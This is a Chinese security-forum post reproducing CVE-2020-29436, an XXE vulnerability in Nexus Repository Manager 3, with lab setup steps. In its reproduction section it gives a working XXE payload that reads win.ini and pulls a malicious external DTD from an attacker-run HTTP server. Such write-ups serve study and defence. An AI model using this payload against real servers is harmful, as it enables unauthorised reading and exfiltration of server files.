CVE-2020-29436:Nexus3 XML外部实体注入复现

ajming   ·   发表于 2021-01-05 15:07:59   ·   技术文章投稿区

0x01简介


Nexus Repository Manager 3是一款通用的软件包仓库管理(Universal Repository Manager)服务。

0x02漏洞概述


编号:CVE-2020-29436Nexus Repository 是一个开源的仓库管理系统,在安装、配置、使用简单的基础上提供了更加丰富的功能。在 Nexus Repository Manager 3 中存在XML外部实体注入( XXE )漏洞。攻击者如果能够获取 Nexus Repository Manager 3 的管理员帐户,就可以配置系统、查看文件系统上的文件。

0x03影响版本


Nexus Repository Manager 3 <= 3.28.1

0x04环境搭建


本地环境需要JDK1.8以上官网下载
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
本次复现使用的版本为3.28.1解压后,到nexus-3.28.1-01\bin目录下命令运行:nexus.exe /run稍等一会,出现下图表示启动成功

访问后台管理页面:
http://IP:8081/
点击登录,输入默认口令:admin/admin123
结果显示不让登陆


根据提示查看虚机中的文件,


找一下度娘,将生成的admin.password复制粘贴就可登录成功01371273-b0f7-45f2-b307-8855b607b623


查看saml模块,


没有权限


需要认证导入证书( https://www.sonatype.com/nexus/repository-pro/trial)
,并且重启服务器终于正常了

0x05漏洞复现


访问http://192.168.43.252:8081/#admin/security/saml


在填入payload之前先用python起一个http服务并在http服务的目录下写一个my.dtd文件,文件内容为:
dtd:
<!ENTITY % all"<!ENTITY &#x25; send SYSTEM '%file;'>">%all;
插入payload并抓包
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/my.dtd"> %dtd; %send; ]><ANY>xxe</ANY>
此时本地my.dtd已经被加载


0x06参考链接


https://paper.seebug.org/1431/http://hackdig.com/12/hack-243598.htmhttps://www.jianshu.com/p/fcb128e34c87

用户名金币积分时间理由
veek 50.00 0 2021-01-06 10:10:25 感谢分享~

打赏我,让我更有动力~

5 Reply   |  Until 2021-1-19 | 745 View

west_black
发表于 2021-1-6

1

评论列表

  • 加载数据中...

编写评论内容

黑影
发表于 2021-1-11

1

评论列表

  • 加载数据中...

编写评论内容

1596376292
发表于 2021-1-11

1

评论列表

  • 加载数据中...

编写评论内容

丨夜丨
发表于 2021-1-19

1

评论列表

  • 加载数据中...

编写评论内容

amwusrso
发表于 2021-1-19

1

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.